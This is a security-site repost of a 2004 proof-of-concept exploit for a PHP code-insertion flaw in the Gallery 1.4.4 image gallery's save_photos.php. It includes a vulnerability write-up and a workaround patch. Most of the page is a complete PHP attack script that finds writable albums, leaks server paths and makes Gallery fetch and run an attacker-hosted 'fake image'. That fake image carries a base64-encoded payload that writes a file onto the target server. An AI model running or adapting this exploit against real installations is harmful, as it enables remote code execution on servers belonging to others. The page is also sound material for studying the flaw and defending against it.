首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Gallery1.4.4save_photos.php PHP Exploit
来源:vfocus.net 作者:aCiDBiTS 发布时间:2004-08-21  

Gallery 1.4.4 save_photos.php PHP Insertion Proof of Concept Exploit

#!/usr/bin/php

<?

/*

Gallery 1.4.4 save_photos.php PHP Insertion Proof of Concept
By aCiDBiTS acidbits@hotmail.com 17-August-2004


++ Vulnerability description ++

Gallery (http://gallery.sf.net/) is a PHP image gallery script. Having
permission to upload photos in some album and the temporal directory is in
the webtree, then it is possible to create a file with any extension and
content. Tested in v 1.4.4, maybe older versions also vulnerable.

When uploading photos with the "URL method", they are saved in the temporal
directory before processing them. Any file with any content is accepted.
After downloading, the file is processed (discarded if it is not an image)
and deleted from the temporal directory.

When the script downloads the file to the temporal directory there's the
function set_time_limit() that by default waits 30 seconds to abort the
process if no more data is recieved and the transfer connection isn't
closed. If the temporal directory is in the webtree, during this 30 seconds
timeout we can access to the file, executing it.

There's also a "directory disclosure" that I've used to determine if the
temporal directory is in gallery's webtree. It consists in sending a longer
filename than permited by the filesystem for the image upload name.


++ How this Proof of Concept works ++

1. You need to have a fake image script (like galfakeimg.php) in a web
accessible by gallery to download it.
2. The script searches for an Album with "everybody" permission to add
photos.
3. Checks if the temporal directory is in the webtree.
4. Tell gallery to download the fake_photo that contains the script.
5. After XEC_TIMEOUT seconds waiting, it executes the temp file and
test.php is created.

Usage (in my debian box):
php4 -q ./gal_poc.php "http://192.168.1.22/galfakeimg.php"
"http://127.0.0.1/gallery"

NOTE: If there are no albums with public permissions to add photos and you
have a valid login, modify the script adding your login cookie.


++ Workaround ++

save_photos.php, line 154:

$file = $gallery->app->tmpDir . "/photo.$name";

Insert:

if(strlen($name)>20) $name=substr($name,strlen($name)-20);
if (!acceptableFormat(strtolower(ereg_replace(".*\.([^\.]*)$", "\\1",
$name)))) die( "\nInvalid file type!\n");
$file = $gallery->app->tmpDir . "/photo.$name";


++ galfakeimg.php ++

This is the content of galfakeimg.php. It has to be placed in a remote web
directory accessible by the gallery script.

---8-<-------------------------8-<-------------------------8<---
<?php
echo "<?php
\$f=fopen(trim(base64_decode(dGVzdC5waHAg)),w);fputs(\$f,trim(base64_decode(PD8gZWNobyAnPHByZT4gXCAgLyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXCAgLzxicj4gKE9vKSAgVGhpcyBnYWxsZXJ5IGlzIHZ1bG5lcmFibGUgISAgKG9PKTxicj4vL3x8XFxcXCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC8vfHxcXFxcIDwvcHJlPic7Pz4K)));fclose(\$f);
?>\n";
for($x=0;$x<65535;$x++) echo " \n";
while(1){}
?>
---8-<-------------------------8-<-------------------------8<---

*/


define( XEC_TIMEOUT, 5);

echo "+--------------------------------------------------------------+\n|
Gallery 1.4.4 save_photos.php PHP Insertion Proof of Concept |\n| By
aCiDBiTS acidbits@hotmail.com 17-August-2004
|\n+--------------------------------------------------------------+\n\n";


if($argc<3) die("Usage: ".$argv[0]." URL_to_fake_photo URL_to_Gallery\n\n");
$host=$argv[2];
if(substr($host,strlen($host)-1,1)!='/') $host.='/';
$fakephoto=$argv[1];

echo "[+] Obtaining PHPSESSID ... \n ";
$webc=get_web($host."view_album.php?set_albumName=".$album[0], 1, '');
$temp=explode("PHPSESSID=",$webc);
$temp1=explode(";",$temp[1]);
$phps="PHPSESSID=".$temp1[0].";";
echo $phps;

echo "\n\n[+] Getting album names ...\n ";
$webc=get_web($host, 0, $phps);
$temp=explode("set_albumName=",$webc);
$nalbum=0;
while($temp[($nalbum*2)+1]){
$temp1= explode( "\"", $temp[($nalbum*2)+1]);
$album[$nalbum]=$temp1[0];
echo $album[$nalbum]." ";
$nalbum++;
}
if(!$nalbum) die(" Failed!\n\n");


echo "\n\n[+] Searching an album with permissions to add photos ...";
$walbum='';
foreach( $album as $temp){
$webc=get_web($host."view_album.php?set_albumName=".$temp, 0, $phps);
$webc=send_post( $host."save_photos.php",
urlencode("urls[]=".$host."&setCaption=1"), $phps);
echo "\n ".$temp." -> ";
if( ereg( "You are no allowed to perform this action", $webc) )
echo "No";
else {
echo "Yes";
$walbum=$temp;
}
}
if( !$walbum ) die ("\n\nFailed! No permissions in any album.\n\n");
echo "\n Using: ".$walbum;

echo "\n\n[+] Getting gallery & temporal directory paths ...";
$webc=get_web($host."view_album.php?set_albumName=".$walbum, 0, $phps);
$temp='/';
for($x=0;$x<256;$x++) $temp.='a';
$webc=send_post( $host."save_photos.php",
urlencode("urls[]")."=".urlencode($fakephoto.$temp)."&setCaption=1", $phps);
$temp=explode("fopen(\"",$webc);
$temp1=explode("photo",$temp[1]);
$tmpd=$temp1[0];
echo "\n Temporal directory: ".$tmpd;
$temp=explode("resource in <b>",$webc);
$temp1=explode("save_photo",$temp[1]);
$scrptd=$temp1[0];
echo "\n Gallery directory: ".$scrptd;

if( !ereg( $scrptd, $tmpd) ) die ("\n\nTemporal directory is out of
gallery's webtree. Can't continue.\n\n" );

$temp=explode("/",$fakephoto);
end($temp);
$sname=current($temp);
echo "\n\n[+] Uploading $sname and executing it ...";
$webc=send_post( $host."save_photos.php",
urlencode("urls[]")."=".urlencode($fakephoto)."&setCaption=1", $phps);
//Maybe you'll need to wait some more seconds, check XEC_TIMEOUT
$webc=get_web($host.str_replace($scrptd,'',$tmpd)."photo.".$sname, 0,
$phps);

echo "\n\n Now go to: ".$host.str_replace($scrptd,'',$tmpd)."test.php";

die("\n\n \ / \ /\n (Oo) Done! (oO)\n //||\\\\
//||\\\\\n\n");


function get_web($url, $h, $cookie)
{
$ch=curl_init();
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_HEADER, $h);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
$data=curl_exec ($ch);
curl_close ($ch);
return $data;
}

function send_post($url,$data, $cookie)
{
$ch=curl_init();
curl_setopt ($ch, CURLOPT_URL, $url );
curl_setopt ($ch, CURLOPT_HEADER, 0);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $data );
curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
curl_setopt ($ch, CURLOPT_TIMEOUT, XEC_TIMEOUT);
$data=curl_exec ($ch);
curl_close ($ch);
return $data;
}

/* \ /
(Oo)
//||\\ */

?>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PlaySMS version 0.7 and prior
·XV v3.x bmp parsing local buff
·YaPiG 0.92b add_coment PHP Ins
·Qt 3.x bmp image parsing local
·Integrity Protection Driver lo
·BadBlue v2.52 Web Server Denia
·Opera Local File/Directory Det
·PADS Simple Stack Overflow Exp
·IpSwitch IMail local passwd de
·MusicDaemon<=0.0.3/etc/shad
·GV postscript viewer Local buf
·Bird Chat 1.61 Denial Of Servi
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved